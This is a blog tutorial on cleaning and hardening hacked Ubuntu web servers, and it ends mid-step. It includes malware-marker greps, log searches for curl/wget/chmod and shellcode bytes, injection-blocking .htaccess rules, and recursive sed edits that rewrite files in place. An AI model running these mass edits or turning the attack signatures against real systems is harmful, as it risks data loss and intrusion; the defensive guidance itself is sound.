I am a Danish programmer living in Bangkok.
Read more about me @ rasmus.rummel.dk.

Ubuntu Web Server Security

Updated 10 Apr 2013. This page contains 4 actionable step-by-step guides related to web server security :

  • How to remove malware from Ubuntu hosted websites.
  • How to remove mass emailers from Ubuntu hosted websites.
  • How to investigate an intrusion after it happened.
  • How to harden an Ubuntu web server.

@ Favourite Design we are not a hosting company, but we do host most of our customer websites. From time to time a website is hacked, and while we can usually restore from backup, we still spend too many resources fighting website malware - and even worse, our customers inevitably get less happy with us. I decided we needed to be more efficient at fighting malware, and I started this page to build up knowledge and to make that knowledge actionable.



Browser warnings

Both Firefox & Chrome warn their users if they try to navigate to a site that is believed to host malware. Below is how this warning looks in Chrome & Firefox : (Chrome calls them malware infected sites or phishing sites depending on the type of attack, while Firefox calls them attack sites)

Actually, the browsers are not testing the site each time a user tries to load it. Instead, Google maintains a central database of suspicious urls, and both Firefox & Chrome periodically contact that database to update their local cache of suspicious urls (or hashes thereof).

Google will add your site url to its suspicious urls database even if your site is not hosting malware itself; it is enough that your site links to a resource that does, eg. through an iframe or through a script tag.

You can check a url against the google suspicious urls database here : http://google.com/safebrowsing/diagnostic?site=http://example.com (replace example.com with the url you want to check).
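If you have several domains to check, you can fetch the diagnostic pages in one go. Below is a minimal sketch - the domain list is of course a placeholder, and since the diagnostic page is meant for humans, the output is just saved for manual review :

  #!/bin/bash
  # Fetch the Google Safe Browsing diagnostic page for each of your domains
  # and save the html for manual review.
  for domain in example.com example.org; do
    curl -s "http://google.com/safebrowsing/diagnostic?site=http://$domain" > "safebrowsing_$domain.html"
  done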

When Google removes a url from the central suspicious urls database, your Chrome or Firefox browser will first need to update its local suspicious urls cache before the url stops triggering a malware warning in that particular browser.


Malware removal procedure

To remove the malware and get Google to remove your url from the central suspicious urls database :
(the malware removal procedure relies heavily on 3 linux commands : find, sed & grep - a consolidated pattern-sweep sketch follows the procedure)

  1. Remove malware :
    1. Backup website : (so if you later by mistake delete or alter files you should not have, you can easily restore them)
      1. Navigate to the web root parent folder.
      2. shell> tar cf WebRootFolderName.tar WebRootFolderName : create an archive of your web folder (tar is recursive).
    2. Investigate all your .htaccess files for suspicious redirects - especially remember to scroll horizontally, as some malware redirects are hidden far to the right in the .htaccess file.
      1. Navigate to the web root parent folder.
      2. shell> find WebRootFolderName -name ".htaccess" > htaccessFiles : write a list of all .htaccess files in the website.
      3. shell> find WebRootFolderName -name ".htaccess" -print0 | xargs -0 -I % bash -c 'printf "\n%s\n" "$1"; cat "$1"' _ % > htaccessAll : if you have many .htaccess files throughout your website, it is convenient to concatenate them all into one handy file, htaccessAll, for easy investigation (the filename is passed to bash as a positional argument so that printf can emit real new lines around it).
    3. Run ClamAV against the website :
      1. Install ClamAV if not already installed :
        1. shell> apt-get update : update your local package index so that you will install the newest version possible.
        2. shell> apt-get install clamav : easy like that.
      2. shell> freshclam : update virus definitions.
      3. Navigate to the web root parent folder.
      4. shell> clamscan -i -r WebRootFolderName : scan the web root folder recursively (-r) and show all infected files (-i).
      5. Investigate any infected file :
        1. For files that are entirely malware, just delete them.
        2. For files that contain malware but where you cannot clearly identify the malware pattern, restore the files from an earlier backup or delete the malware manually.
        3. For files that contain malware where you can identify the malware pattern, do the following :
          1. Navigate to the website root folder.
          2. For each malware pattern execute the following command :
            • shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/BEGINPATTERN.*ENDPATTERN//g;p}' {} \; : will find all files recursively and within each file delete all strings beginning with BEGINPATTERN and ending with ENDPATTERN, even if the string contains new lines.
      Note that AV scanning is only a small part of the removal solution because :
      • Often the virus is not on your server but is instead linked, eg. using iframes or javascript tags, so it is loaded from remote computers and the typical AV scanner will not see it.
      • Lots of viruses change signature daily or even each time they are served, making it difficult for AV scanners to identify them.
    4. Search the website for all new and changed files since a specific date :
      1. Navigate to the website root parent folder.
      2. shell> find WebRootFolderName -newermt '2013-01-14T03:30:00' : search for files that are new or modified AFTER 14 Jan 2013 3:30 am (note that -newermt is not available in older versions of find - see the sketch below).
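      If your find does not support -newermt, a common workaround is to create a reference file with the wanted timestamp and compare against it with -newer - a small sketch (the /tmp path is just a choice) :
        # create a reference file dated 14 Jan 2013 03:30 (touch -t format is [[CC]YY]MMDDhhmm)
        touch -t 201301140330 /tmp/newer-ref
        # list files modified after the reference file
        find WebRootFolderName -newer /tmp/newer-ref
        rm /tmp/newer-ref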
    5. Search the website for iframes :
      1. Navigate to the website root parent folder.
      2. shell> find WebRootFolderName -type f -exec grep -l "<iframe" {} \; | tee filesWithIframes : list all files that contain an iframe - display the list on screen and also write it to a file in case it is a big list.
      3. Investigate the files and if you find malware iframes, see if you can match a pattern for how the malware iframes are written :
        1. Navigate to the website root folder.
        2. For each malware pattern execute the following command :
          • shell> find . -type f -exec sed -i "s%BEGINPATTERN[^<]*URL[^<]*ENDPATTERN%%g" {} \; : will find all files recursively and within each file delete all strings beginning with BEGINPATTERN, then somewhere containing URL, and at last ending with ENDPATTERN. This command only works if the full malware pattern is contained within one line (also note the use of '[^<]*' instead of '.*' to avoid the greedy behaviour of sed).
            • Typical BEGINPATTERN : document\.write('<iframe
            • URL : this is the url that points to a page that will load malware, eg. ayblsn\.pcanywhere\.net
            • Typical ENDPATTERN : </iframe>')
    6. Search the website for suspicious javascript tags :
      1. Navigate to the website root parent folder.
      2. shell> grep -R "<script[^<]*src=[^<]*</script>" WebRootFolderName | tee javascriptTagsAll : this will give a list of all javascript tags, each tag prefixed with the filename. Look quickly through the src attributes to see if any look suspicious.
    7. Test for other typical malware patterns :
      1. Navigate to the website root parent folder.
      2. Execute the following scripts :
        • shell> find WebRootFolderName -type f -name "*.php" -exec grep -l "\$s=substr(8,1)" {} \; | tee malwareFiles_substr : the $s=substr(8,1) is a BEGINPATTERN of a long number encoded malware pattern (I have never found this pattern outside php files). To remove :
          1. Navigate to the website root folder.
          2. Execute the following command :
            • shell> find . -type f -name "*.php" | xargs sed -i 's/\$s=substr.*$//'
        • shell> find WebRootFolderName -type f -exec grep -l "<\!--c3284d-->.*<\!--\/c3284d-->" {} \; | tee malwareFiles_c3284d : the <\!--c3284d--> is a BEGINPATTERN of at least 2 different attacks. To remove :
          1. Navigate to the website root folder.
          2. Execute the following command :
            • shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/<!--c3284d-->.*<!--\/c3284d-->//g;p}' {} \;
        • shell> find WebRootFolderName -type f -exec grep -l 'default_action="FilesMan"' {} \; | tee malwareFiles_massMailer : the default_action="FilesMan" marker identifies a common php backdoor / mass emailer. To remove :
          1. Navigate to the website root folder.
          2. Execute the following command :
            • shell> find . -type f -exec sed -i 's/<?php if(isset.*default_action="FilesMan".*/<?/g' {} \;
    8. After cleanup : (some would say before cleanup)
      • Change all passwords :
        • FTP accounts
        • Panel accounts (eg. cPanel, ISPConfig etc.)
        • CMS/Backoffice user accounts
        • Database connection passwords
      • See Intrusion investigation to try to identify how the hacker gained access, otherwise the hacker may just do the same thing again.
      • See Web server hardening to try to build a better hack shield.
  2. Request Google to remove the website from the suspicious urls database :
    1. Register the website domain with google webmaster tools :
      1. Sign in @ http://www.google.com/webmasters/ (using your google account, eg. your gmail account)
      2. Click the "ADD A SITE" button and add your domain.
      3. After adding your domain, you need to verify that you are the owner - follow the 4 steps as outlined by google, ending with clicking the "VERIFY" button.
      4. After clicking the "VERIFY" button, you should see a verification confirmation. Then click on the "continue" link.
      5. As this site is newly added to webmaster tools, there will likely not be any data yet.
    2. Request removal :
      1. When data arrives for your site, you can navigate to "Health > Malware", and if google has found malware, you will get a "Request a review" button - click it.
      2. You will get a popup where you confirm that you have tried to remove the malware. I also like to use the comment box - if it is read by a human, I would think it speeds up the process. Click the "OK" button.
      3. Now you will have to wait. Google does NOT contact you, eg. by email, when they have made a decision on whether to remove your url from their suspicious urls database. You may check back at webmaster tools later to see how it is going, or you may simply wait and see if Chrome & Firefox stop the malware warnings.
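The pattern searches in steps 1.5 - 1.7 are easy to forget one by one, so it is convenient to collect them in a small script that can be re-run after every cleanup. Below is a minimal sketch - the web root path and report file name are my own choices, and the pattern list should be extended with whatever you find on your own system :

  #!/bin/bash
  # Sketch : re-run the typical malware pattern searches against a web root
  # and collect all file hits in one report.
  WEBROOT="/var/www/myWebSite.com"   # adjust to your own web root folder
  REPORT="malware-sweep-report"
  PATTERNS=(
    '<iframe'
    '<!--c3284d-->'
    '$s=substr(8,1)'
    'default_action="FilesMan"'
  )
  > "$REPORT"
  for p in "${PATTERNS[@]}"; do
    echo "===== pattern : $p =====" >> "$REPORT"
    # -F treats the pattern as a fixed string, -l prints only filenames
    grep -R -l -F "$p" "$WEBROOT" >> "$REPORT" 2>/dev/null
  done
  cat "$REPORT"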


Mass emailer removal

Mass emailers are also malware, however they deserve a little more in-depth removal guide than the above.

It can be very frustrating to see your webserver being taken over by mass emailers, and while many mass emailers will be identified by the above malware removal process, some will not, in which case you need to identify the php scripts from which the spam mails originate.

  1. Confirm that your webserver is sending out spam :
    1. shell> tail -f /var/log/mail.log : dynamically print log entries to screen - if one or more mass emailers are active, you should see a constant stream of new log messages, and based on the addresses it is quite easy to determine whether the messages are legitimate (sent from your websites) or spam (sent from mass emailers).
    2. shell> mailq : a huge mail queue on a webserver whose websites send only a few legitimate emails is a strong indication that mass emailers are active (there may actually be so many queued mail messages that mailq cannot list them).
    3. shell> ls -l /var/spool/mqueue | wc -l : count the mail messages in the sendmail MTA (Mail Transfer Agent) queue. If you have a mass emailer problem, there will typically be many thousands of email messages.
    4. shell> ls -l /var/spool/mqueue-client | wc -l : count the mail messages in the sendmail MSP (Mail Submission Program) queue. Note that mailq is actually listing the contents of mqueue & mqueue-client.
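    While you hunt for the sending script, it is handy to watch whether the queues keep growing - a one-liner sketch using the watch command :
    shell> watch -n 60 'ls /var/spool/mqueue | wc -l; ls /var/spool/mqueue-client | wc -l' : re-count both queues every 60 seconds - steadily growing numbers mean a mass emailer is still active.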
  2. If you did not already scan for malware in the above malware removal guide, scan for malware now :
    1. Install ClamAV if not already installed :
      1. shell> apt-get update : update your local package index so that you will install the newest version possible.
      2. shell> apt-get install clamav : easy like that.
    2. shell> freshclam : update virus definitions.
    3. Navigate to the web root parent folder.
    4. shell> clamscan -i -r WebRootFolderName : scan the web root folder recursively (-r) and show all infected files (-i). Typically the mass emailer will be installed inside of your web root folder.
    5. Investigate any infected file :
      1. For files that are entirely malware, just delete them.
      2. For files that contain malware but where you cannot clearly identify the malware pattern, restore the files from an earlier backup or delete the malware manually.
      3. For files that contain malware where you can identify the malware pattern, do the following :
        1. Navigate to the website root folder.
        2. For each malware pattern execute the following command :
          • shell> find . -type f -exec sed -i -n '1h;1!H;${;g;s/BEGINPATTERN.*ENDPATTERN//g;p}' {} \; : will find all files recursively and within each file delete all strings beginning with BEGINPATTERN and ending with ENDPATTERN, even if the string contains new lines.
  3. Configure PHP mail to insert a header in each email that shows the php file that sent the email and the user under which the php file was executed :
    1. Identify the php.ini file you need to change : you may have multiple php.ini files on your system, and different websites may use different php.ini files, so it may not be possible to know which php.ini file to change unless you know which website is sending out spam. For a reliable result, you should change them all :
      • shell> php -i | grep php.ini : this will show you the php.ini file in use for the php command line - this is not necessarily the same php.ini file in use for your websites.
      • /etc/php5/ : contains all your php.ini files.
    2. shell> nano /etc/php5/cgi/php.ini : open php.ini in the nano editor (most of my websites run PHP as CGI)
    3. Make sure you have the following property and that it is un-commented : (search for mail.add_x_header)
      • mail.add_x_header = On : this will make PHP mail insert the originating php script and the UID by which the script was executed in all mail headers.
    4. Press ctrl+x and then y to close and save the php.ini file.
    5. shell> service apache2 reload : whatever your PHP mode, make sure the changes to php.ini are applied.
  4. Examine emails for the header that shows which php file sent the email :
    1. shell> cd /var/spool/mqueue : change directory to the mqueue folder.
    2. Find UID and originating script of one of the mails in mqueue :
      1. shell> ls -l : list all files in the mqueue folder.
      2. shell> cat qfr2L261A* : select one of the files and print the content to screen using cat and the filename.
      3. Look for X-PHP-Originating-Script and if found you can read out the UID and script name - in my case it is :
        • UID = 1004
        • Script name = press.php : this is my mass emailer.
    3. shell> find /var/www -name "press.php" : locate the script file.
    4. If you are using ISPConfig, it is also interesting to identify the website like this :
      1. shell> grep 'x:1004:' /etc/passwd : get the default folder of UID 1004 - in my case /var/www/clients/client40/web117, so now I know in which website press.php exists.
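    5. Instead of cat'ing queue files one by one, you can aggregate the X-PHP-Originating-Script headers across the whole queue - a sketch, assuming the qf* naming sendmail uses for queued header files :
      • shell> grep -h "X-PHP-Originating-Script" /var/spool/mqueue/qf* | sort | uniq -c | sort -rn : count how many queued mails each php script generated - the top entry is most likely your mass emailer.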
  5. Delete the mass mailer script :
    1. Check that the mass emailer script is not a legitimate script with the mass emailer code appended - you don't want to delete a legitimate script.
    2. You should also take note of the date the script was modified or uploaded - more malware may have been uploaded together with the mass emailer.
  6. You may have way more than 1 mass emailer - go back to main step 1 and check if your webserver is still sending spam.
  7. Tighten your firewall : allow only relevant mail programs to make connections to the internet on port 25 - see the sketch below.
    (here using UFW (Uncomplicated FireWall), which is a frontend for IPTables)

    Some mass emailers may be self-contained, not using your MTA (on most webserver installations sendmail is used as MTA) and consequently not writing to mail.log nor using the mail queue. I don't know how to find that kind of mass emailer, but I do know how to stop them :

    After you have set up blocking of outbound smtp except for your own MTA, you can check the firewall log (in the case of UFW : /var/log/ufw.log) to see if you get any outbound blocks on port 25 - if you do, then you know that there is a self-contained mass emailer on your system.
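    UFW itself cannot filter on which program or user opens a connection, so to allow only your MTA out on port 25 you need the iptables owner module directly. A minimal sketch (the uid is an assumption - sendmail typically runs as root, check yours with ps; also note that rules added this way are not persistent across reboots) :
      # allow outbound SMTP only for the user running the MTA, reject everything else
      iptables -A OUTPUT -p tcp --dport 25 -m owner --uid-owner root -j ACCEPT
      iptables -A OUTPUT -p tcp --dport 25 -j REJECT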

  8. Check if your webserver is listed at any blacklist servers :
    1. Navigate to a blacklist checker, eg. rbls.
    2. Submit the IP address of your webserver.
    3. Result for IP 27.254.33.57 (my webserver) - it looks like I am listed on 5 blacklist servers, however it is actually only 2 : barracuda and cbl (the 3 spamhaus listings come from cbl).
    4. Follow all the blacklist server links in the red blacklist section and request to be removed, one blacklist server at a time.
    5. If your server is blacklisted at Microsoft so that you cannot send email to hotmail, then sign up at Smart Network Data Services to try to resolve the situation (it is going to take a long time).
    6. Note that your server IP may just be in a bad neighborhood. If other servers on the same network are sending spam or are otherwise malicious, then some blacklist servers will blacklist the whole network, eg. apews.org and notably Microsoft. In such a case, where other servers on your network outside your control are malicious, you may not be able to solve the problem - the only solution may be to move your server to another network.


Intrusion investigation

Note : this guide is in beta release.

How did the hacker compromise the system? This is a crucial question, because if that particular method is not countered, then all the cleanup is wasted - the hacker can just come back and abuse your site again.

  • Log file analysis : (there are online hack attempt identifiers where you can upload your log files for analysis)
    1. Check the Apache config file /etc/apache2/apache2.conf for the LogFormat directives that define named formats for access logs.
    2. Check the Apache vhost config file /etc/apache2/conf.d/other-vhosts-access-log to see the format used for the vhosts access log.
    3. Apache main access log file : /var/log/apache2/access.log - see Appendix : Log file formats to understand the Apache2 access.log.
    4. Apache vhost access log file : /var/log/apache2/other_vhosts_access.log - the default is the vhost_combined format.
    5. Apache error log file : /var/log/apache2/error.log - there are no alternative formats for this log file.
    6. Ftp log file : /var/log/pure-ftpd - your ftp log files may be in a different folder.
    7. shell> cd /var/log/apache2 : navigate to the Apache log folder.
    8. Identify the log files that contain entries for the date of the attack - here I assume it is error.log, access.log and other_vhosts_access.log.
    9. Search for sql injection :
      • shell> grep -i "insert\|update\|replace" access.log : search for sql injection attacks (-i to also catch mixed case).
    10. Search for RFI & LFI attacks :
      • shell> awk '$7 ~ /\?/ && $7 ~ /http/ {print FILENAME, $1, $4, $7}' access.log : list requests whose querystring contains a url - a typical sign of RFI / LFI attempts.
    11. Search for http PUT requests :
      • shell> grep '"PUT' access.log : the PUT method should normally not appear in a website access log.
    12. Search for brute force attacks :
      1. Identify all login pages.
      2. shell> cat access.log | grep "MyLoginPage"
  • Search for Apache exploits :
    1. shell> updatedb & : update the locate database.
    2. shell> for i in `locate access_log`; do echo $i; egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' $i; done : run the exploit-pattern grep over every access log found by locate (see steps-to-investigate-hacked-linux-server)
    3. shell> egrep -i '(chr\(|system\()|(curl|wget|chmod|gcc|perl)%20' /path/to/log/files/*
  • Search for Shell code :
    1. shell> grep '\\x90' /path/to/access/logs/* : search for the literal "\x90" NOP bytes that often appear in buffer overflow shellcode.
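All the searches above can be collected in one loop, so a full sweep of the main access log is a single script. A sketch that simply mirrors the patterns used above (note that in other_vhosts_access.log the request field is shifted one position to the right, because the vhost comes first) :

  #!/bin/bash
  # Run the typical attack-pattern searches against the Apache access log in one go.
  LOG="/var/log/apache2/access.log"
  echo "===== sql injection ====="
  grep -i "insert\|update\|replace" "$LOG"
  echo "===== RFI / LFI ====="
  awk '$7 ~ /\?/ && $7 ~ /http/ {print $1, $4, $7}' "$LOG"
  echo "===== http put requests ====="
  grep '"PUT' "$LOG"
  echo "===== shellcode NOP bytes ====="
  grep '\\x90' "$LOG"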

If one of your websites is currently under attack and you want more log information to work with, you can change the LogLevel to debug for that website in the apache website configuration file (just search the configuration file for LogLevel).

Example :

I found this in our log file : http://search.yahoo.com/search;_ylt=A0oG7l_bp1BRqFEAOBhXNyoA?p=adm+login&n=10&ei=UTF-8&va_vt=any&vo_vt=any&ve_vt=any&vp_vt=any&vst=0&vf=all&vc=th&vm=i&fl=0&fr=moz35&xargs=0&pstart=1&b=11&xa=K.zqLWvwdn5O.9s8qFHaiw--,1364326747
This link seems to point to a list of login pages for which credentials are known - the hacker followed the link to our customer's login page and logged right in as administrator.



Web server hardening


  1. Hardening Apache2 :
    1. Relevant configuration files :
      • /etc/apache2/apache2.conf : the main Apache2 configuration file.
      • /var/www/myWebSite.com/.htaccess : htaccess files are often used to change the properties of a specific website.
      • /etc/apache2/sites-available/myWebSite : each website has its own configuration file :
        • <VirtualHost *:80> : configuration file root element which specifies on which IPs (*) & ports (80) this element can match a request.
        • ServerName myWebSite.com : property specifying for which domain this configuration file should be matched.
        • ServerAlias www.myWebSite.com : possible to specify many other domain names for which this configuration file should be matched.
        • DocumentRoot /var/www/myWebSite.com : the root folder for the website specified by the ServerName directive.
        • <Directory /> : collection of directives that apply only to the specified folder and its subfolders, so '/' will apply to ALL folders on the server.
        • Order Deny,Allow
        • Allow from All : default Apache2 configuration, which is VERY dangerous as it allows Apache2 to serve any file mapped from a url (to the extent that the Apache2 user has access to the file).
        • </Directory>
        • <Directory /var/www/myWebSite.com> : collection of directives that apply only to the myWebSite root folder and its subfolders.
        • Options Indexes FollowSymLinks MultiViews : the Options directive here sets that directory browsing is allowed (Indexes), that symlinks should be followed (FollowSymLinks) and that content negotiation is enabled, so Apache2 may serve an alternative matching file when the requested name does not match exactly (MultiViews).
        • DirectoryIndex index.html index.php : the DirectoryIndex directive sets the default document, here index.html, and if that does not exist then index.php, and if that does not exist either, then either directory browsing or a 404 error depending on whether the Options directive sets Indexes.
        • AllowOverride None : the AllowOverride directive here states that no Apache2 configurations are allowed to be overridden, eg. by .htaccess
        • Order allow,deny
        • Allow from All : here the "Allow from All" is less dangerous because it only applies to the webroot and below.
        • </Directory>
        • </VirtualHost>
    2. Change website configuration files : (here /etc/apache2/sites-available/myWebSite)
      1. shell> nano /etc/apache2/sites-available/myWebSite : open the apache2 configuration file for your website in the nano editor.
      2. Disable directory listing : to make it more difficult for a hacker to see what files are available in the website - otherwise the hacker may easily find the database connection file, from there any backoffice admin accounts, and then you have lost.
        • <VirtualHost *:80>
        • ServerName myWebSite.com
        • <Directory /var/www/myWebSite.com>
        • Options FollowSymLinks MultiViews : remove the Indexes value from Options.
      3. Prohibit Apache2 from delivering files outside the webroot :
        • <VirtualHost *:80>
        • ServerName myWebSite.com
        • <Directory /> : here we use the all-folders specification to set the default action for any folder on the server for the request handled.
        • Order Deny,Allow
        • Deny from All : set Apache2 to deny delivering any resource by default.
        • AllowOverride None : set Apache2 to deny overriding directives using .htaccess by default, to avoid people making their websites less secure. If it is necessary to override some settings for a website (and it often is), then allow override for that specific folder.
      4. Press ctrl+x and then y to exit and save.
      5. Update Apache2 to use the new configuration file :
        1. shell> a2dissite myWebSite : prepare to remove myWebSite from /etc/apache2/sites-enabled.
        2. shell> service apache2 reload : actually do the removal.
        3. shell> a2ensite myWebSite : prepare to add myWebSite to /etc/apache2/sites-enabled.
        4. shell> service apache2 reload : actually do the addition.
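      Before reloading, it is a good habit to syntax-check the configuration so a typo does not take Apache2 down :
        • shell> apache2ctl configtest : prints "Syntax OK" if all configuration files parse correctly.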
    3. Permissions considerations :
      By default, Apache2 is started by the root user; however, when serving requests, Apache2 will instead execute with the permissions of the user set in the User directive.
      • shell> ps -ef | grep apache2 : show all users that have started apache2 - the default is one apache2 process started by root and all others by www-data (by default the www-data user is a member of the www-data group).
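      Since www-data is the user a compromised web application executes as, it is worth auditing what that user can write to. A sketch using find (the /var/www path is an assumption - use your own web root) :
      • shell> find /var/www -type f \( -user www-data -o -perm -o+w \) : list files owned by www-data or world-writable - served files should normally not be writable by the web server user.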
  2. Hardening PHP :
    1. Turn off the following php options in php.ini : (if your own php code is not using them)
      • register_globals off : to avoid that any variable in the querystring automatically becomes usable by PHP code.
      • allow_url_fopen off : disable php's ability to use fopen() to read remote files.
      • allow_url_include off : disable php's ability to use include & require for remote file access (one of the most common attack points for code injection).
      • display_errors off : should only be set to on while debugging a problem, otherwise hackers may get vital information by provoking errors.
    2. Using .htaccess to block different attacks : (note that these rules require mod_rewrite to be enabled and a RewriteEngine On directive above them)

      # Block out any script trying to set a mosConfig value through the URL
      RewriteCond %{QUERY_STRING} mosConfig_[a-zA-Z_]{1,21}(=|\%3D) [OR]
      # Block out any script trying to base64_encode crap to send via URL
      RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
      # Block out any script that includes a <script> tag in URL
      RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
      # Block out any script trying to set a PHP GLOBALS variable via URL
      RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
      # Block out any script trying to modify a _REQUEST variable via URL
      RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
      # Answer all blocked requests with a 403 Forbidden error!
      RewriteRule ^(.*)$ index.php [F,L]
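      After adding the rules, you can verify that they actually trigger by requesting a url that should be blocked - a sketch (replace myWebSite.com with your own domain) :
      shell> curl -s -o /dev/null -w "%{http_code}\n" "http://myWebSite.com/index.php?foo=%3Cscript%3Ealert(1)%3C/script%3E" : should print 403 if the block rules are active.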

  3. Hardening database access :
    • Each database should have its own user for connections, so that if a hacker gains access to one database, he will not have access to more than that database. Also never ever use the database root or sa user in your code (I have seen this multiple times).
    • If you are running scripts accessing the database (eg. a database backup script via Crontab), then do NOT use the root user even if it is convenient (I have done this myself); instead use a dedicated user - eg. for database backup, create a dedicated database user with only the necessary permissions :
      1. shell> mysql -u root -p : log on to your MySQL database server as root.
      2. mysql> create user 'backup'@'localhost' identified by 'SomePassword'; : create the user to use for backup.
      3. mysql> grant select, lock tables on *.* to 'backup'@'localhost'; : grant only the necessary privileges, that is select and lock tables on all databases.
      Now use this backup user in your backup script instead of the MySQL root or another administrative user.
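      For example, a nightly dump line in a backup script could then look like this (a sketch - the paths are my own choices) :
      shell> mysqldump -u backup -pSomePassword --all-databases > /var/backups/all-databases.sql : dump all databases using the restricted backup user instead of root - select and lock tables are exactly the privileges a plain mysqldump needs.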
  4. Shield against XSS attacks : (also see http://securityblog.howellsonline.ca/2013/02/indepth-cross-site-scripting/)
    1. Review ALL your pages where user data is received, and if possible implement dedicated filtering and escaping libraries to avoid XSS attacks : (eg. AntiXSS for .NET or OWASP ESAPI for PHP, Java, .NET and others)
      • Login, Register and Profile pages.
      • Comment tracks.
      • CMS/Backoffice pages.
  5. Firewall :
    A firewall is used primarily to specify on which ports, and secondarily from which IP addresses, your server accepts incoming network traffic. A firewall can therefore primarily guard against attacks on network enabled services you did not know were running on your server, and secondarily (and unreliably) guard against eg. countries from which you have identified most attacks.
    1. Install & configure UFW (Uncomplicated FireWall), the default firewall configuration tool on Ubuntu :
      1. shell> apt-get update : update your Ubuntu package list before installing the next programs.
      2. shell> apt-get install nmap : install Nmap portscanner (if already installed no harm is done).
      3. shell> nmap -sV -p 0-65535 localhost : scan all ports for listening services - in my example there are a lot of open ports that are not necessary for the function of the hosted websites.
      4. shell> apt-get install ufw : install UFW (if already installed no harm is done).
      5. shell> ufw enable : UFW is disabled by default (I have never had problems with UFW cutting my current SSH session when enabling it on a remote server).
      6. shell> ufw allow 22 : first things first - allow incoming traffic on port 22 so that you can SSH access your server.
      7. shell> ufw allow apache2 : if this is a web server then allow traffic to all ports specified by Apache2 (default only port 80).
      8. shell> ufw logging on : better enable logging in case you come under attack (logs go to /var/log/ufw.log; the default log level has a low footprint).
      9. shell> ufw default deny : be sure that UFW is denying all traffic that is not explicitly allowed.
      10. shell> ufw status verbose : let's see the status of the UFW firewall - only the necessary ports are opened (I also allow connections to the Bacula file daemon on port 9102, otherwise my backup server would not be able to connect).
      11. remote shell> nmap -sV 27.254.33.97 : here I scan the ports from a remote server to confirm that no other ports can be probed than the ones opened by UFW. Check that the status of the ports not shown is "filtered", which means that Nmap does not get any response and therefore cannot even determine whether the ports are closed (port 9102 is shown incorrectly by Nmap - a known Nmap problem).

      Now a hacker will not be able to intrude into the system through other services than those we have allowed through the firewall. Depending on the services you need to deliver on your server, you will need to open different ports - eg. a name server typically runs on port 53, an SMTP server typically runs on port 25 and so on (see Standard port numbers)

    Firewall for dedicated database server

    Say you have your databases on a dedicated database server and your websites on another dedicated web server; then your web code will need to connect remotely to your databases - that is, you need to allow remote connections to your databases, which means a hacker can try to gain direct access to them.

    Solutions :

    • Tell your web developers to create database users that can connect ONLY from the IP address of the web server that hosts the web site :
      • mysql> grant all on MyDatabase.* to 'MyUser'@'WebServerIP' identified by 'MyPassword';
        However, this solution has 2 drawbacks :
        • If you move your web server to another IP or you move a website to another web server, it will break the database connection.
        • Your developers will often not comply, because it is more convenient to create a user that can connect from everywhere - partly because they don't need to find the IP, and partly because the same user can be used from their development machines.
    • Setup a network-wide firewall rule : (this is where IP-based firewall rules actually are useful)

      Say you have a standard C-class 24-bit network, eg. 27.254.33.0/24, so that all your servers are on IPs belonging to that network; then on the database server you can set up a firewall rule that allows connections on the database port (MySQL defaults to port 3306) only from IPs belonging to that network :

      • database server shell> ufw allow from 27.254.33.0/24 to any port 3306 proto tcp : allow IPs belonging to the 27.254.33.0/24 network to connect to port 3306 using TCP on any IP address bound on the database server.

      Now even if some of your database users are anonymous (granted access from anywhere), it is ONLY possible to connect to the database from IPs within your network.

    Firewall for virtual machine host server

    Say you have a server that hosts multiple virtual machines with many different services - eg. your web server and your database server are actually virtual machines on the same host server. Your challenge now is that requests to any of these virtual servers need to be routed through your host server, typically over a network bridge.

  6. Automate malware scanning :
    1. Scan for viruses using ClamAV :
      1. Install ClamAV : (ClamAV is not the best antivirus scanner, but it is free and commonly used in the linux community)
        1. shell> apt-get update : update your package information cache.
        2. shell> apt-get install clamav : install clamav.
        3. shell> freshclam : update ClamAV signature database.
        4. shell> clamscan -r -i /var/www : do a manual scan to see what it looks like (here I scan /var/www recursively (-r), showing only infected files (-i)).
      2. Automate running ClamAV :
        1. Create a script that executes clamscan and email the result :
          1. shell> cd /var/MyScripts : navigate to the folder where you keep your scripts (or create a new folder or use your home folder).
          2. shell> nano clamav.sh : open the nano editor to create a file called clamav.sh (or download clamav.sh)
          3. Insert the following code :
            • #!/bin/bash
            • SCAN="$(which clamscan)"
            • MAIL="$(which sendmail)"
            • MAILTO="YourEmail" : eg. rasmusrummel@gmail.com
            • REPORTFILE="/YourScriptFolder/clamav-report" : eg. /var/MyScripts/clamav-report
            • HOSTNAME="$(hostname)" : if you have multiple servers, you will want to know on what host this script was running
            • DIRECTORY="/var/www" : folder to scan recursively for virus.
            • echo -e "Subject: ClamAV report - " "$HOSTNAME" > $REPORTFILE
            • echo -e "\n----- Scan started : " "$(date)" " -----\n" >> $REPORTFILE
            • $SCAN -r -i $DIRECTORY >> $REPORTFILE
            • echo -e "\n\n-----Scan ended : " "$(date)" " -----\n" >> $REPORTFILE
            • $MAIL $MAILTO < $REPORTFILE
          4. Press ctrl+x and then y to exit and save.
          5. shell> ls -l : you should see the clamav.sh file in the list.
        2. shell> ./clamav.sh : execute the script to confirm that everything works and that you get a report in your email inbox.
        3. Run clamav.sh script every night using Crontab :
          1. Get your relevant environment variables :
            1. shell> echo $SHELL : my shell is /bin/bash.
            2. shell> echo $PATH : my path is /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games.
          2. shell> crontab -e : open crontab in default editor (likely nano).
          3. Insert the following code at the top of the crontab file (if not already there) :
            • SHELL=/bin/bash : use your own value.
            • PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games : use your own value.
          4. Insert the following code at the bottom of the crontab file :
            • 5 3 * * * /var/MyScripts/clamav.sh : execute the clamav.sh script 5 minutes past 3 in the morning every day of the month every month of the year and every day of the week.
          5. Press ctrl+x and then y to close the crontab file and save the changes.
        4. You should now get an email every morning with a clamscan report.
    2. IMPORTANT! Scan for new and/or changed files : since an attacker typically changes files or creates new ones, scanning for new and/or changed files helps you tremendously in fighting hackers and gives you an early warning. Scanning for new files is in my opinion one of the most important things to do, and it is easy too.
      1. Create a script that executes the find command and email the result :
        1. shell> cd /var/MyScripts : navigate to the folder where you keep your scripts (or create a new folder or use your home folder).
